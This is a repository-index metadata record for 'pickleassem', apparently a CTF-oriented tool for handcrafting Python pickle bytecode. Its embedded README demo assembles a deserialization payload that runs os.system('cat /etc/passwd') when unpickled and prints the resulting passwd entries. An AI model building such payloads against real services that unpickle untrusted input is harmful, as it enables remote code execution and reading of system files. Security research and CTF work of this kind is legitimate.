{"id":15287467,"url":"https://github.com/gousaiyang/pickleassem","last_synced_at":"2025-04-13T05:32:33.706Z","repository":{"id":57452509,"uuid":"229147105","full_name":"gousaiyang/pickleassem","owner":"gousaiyang","description":"A simple pickle assembler to make handcrafting pickle bytecode easier.","archived":false,"fork":false,"pushed_at":"2021-04-16T00:36:55.000Z","size":43,"stargazers_count":16,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-03-26T22:11:54.085Z","etag":null,"topics":["assembler","bytecode","ctf","exploit","pickle","security","security-tools"],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/gousaiyang.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2019-12-19T22:14:06.000Z","updated_at":"2024-07-02T14:27:32.000Z","dependencies_parsed_at":"2022-09-02T10:10:53.292Z","dependency_job_id":null,"html_url":"https://github.com/gousaiyang/pickleassem","commit_stats":null,"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gousaiyang%2Fpickleassem","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gousaiyang%2Fpickleassem/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gousaiyang%2Fpickleassem/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gousaiyang%2Fpickleassem/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/gousaiyang","download_url":"https://codeload.github.com/go
usaiyang/pickleassem/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248670465,"owners_count":21142896,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["assembler","bytecode","ctf","exploit","pickle","security","security-tools"],"created_at":"2024-09-30T15:28:15.559Z","updated_at":"2025-04-13T05:32:33.673Z","avatar_url":"https://github.com/gousaiyang.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# pickleassem\r\n\r\n[![PyPI - Downloads](https://pepy.tech/badge/pickleassem)](https://pepy.tech/count/pickleassem)\r\n[![PyPI - Version](https://img.shields.io/pypi/v/pickleassem.svg)](https://pypi.org/project/pickleassem)\r\n[![PyPI - Python Version](https://img.shields.io/pypi/pyversions/pickleassem.svg)](https://pypi.org/project/pickleassem)\r\n\r\n[![GitHub Actions - Status](https://github.com/gousaiyang/pickleassem/workflows/Build/badge.svg)](https://github.com/gousaiyang/pickleassem/actions?query=workflow%3ABuild)\r\n[![Codecov - Coverage](https://codecov.io/gh/gousaiyang/pickleassem/branch/master/graph/badge.svg)](https://codecov.io/gh/gousaiyang/pickleassem)\r\n\r\nA simple pickle assembler to make handcrafting pickle bytecode easier.\r\n\r\nThis is useful for CTF challenges like [pyshv in Balsn CTF 2019](https://ctftime.org/task/9386).\r\n\r\n## Demo\r\n\r\n```python\r\nimport pickle\r\nimport pickletools\r\n\r\nfrom pickleassem import PickleAssembler\r\n\r\npa = PickleAssembler(proto=4)\r\npa.push_mark()\r\npa.util_push('cat /etc/passwd')\r\npa.build_inst('os', 
'system')\r\npayload = pa.assemble()\r\nassert b'R' not in payload\r\nprint(payload)\r\npickletools.dis(payload, annotate=1)\r\npickle.loads(payload)\r\n```\r\n\r\nOutput:\r\n\r\n```\r\nb'\\x80\\x04(\\x8c\\x0fcat /etc/passwdios\\nsystem\\n.'\r\n    0: \\x80 PROTO      4 Protocol version indicator.\r\n    2: (    MARK         Push markobject onto the stack.\r\n    3: \\x8c     SHORT_BINUNICODE 'cat /etc/passwd' Push a Python Unicode string object.\r\n   20: i        INST       'os system' (MARK at 2) Build a class instance.\r\n   31: .    STOP                                   Stop the unpickling machine.\r\nhighest protocol among opcodes = 4\r\nroot:x:0:0:root:/root:/bin/bash\r\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\r\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\r\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\r\n...\r\n```\r\n\r\n## Installation\r\n\r\nInstall with pip: `pip install -U pickleassem`\r\n\r\n## Documentation\r\n\r\nJust refer to the source code. Each method of `PickleAssembler` whose name begins with `push`, `build`, `pop` or `memo` corresponds to a pickle opcode. Methods whose name begins with `util` are higher-level utility functions. 
`append_raw` can be used to insert arbitrary raw opcodes.\r\n\r\nThe following opcodes and corresponding features are not implemented: `PERSID`, `BINPERSID`, `EXT1`, `EXT2`, `EXT4`, `FRAME`, `NEXT_BUFFER`, `READONLY_BUFFER`.\r\n\r\n## See Also\r\n\r\nOther tools for pickle exploitation:\r\n\r\n- `anapickle`: [slides](https://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_Slides.pdf), [repo](https://github.com/sensepost/anapickle)\r\n- [`pwnypack.pickle`](https://github.com/edibledinos/pwnypack/blob/master/pwnypack/pickle.py)\r\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgousaiyang%2Fpickleassem","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fgousaiyang%2Fpickleassem","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgousaiyang%2Fpickleassem/lists"}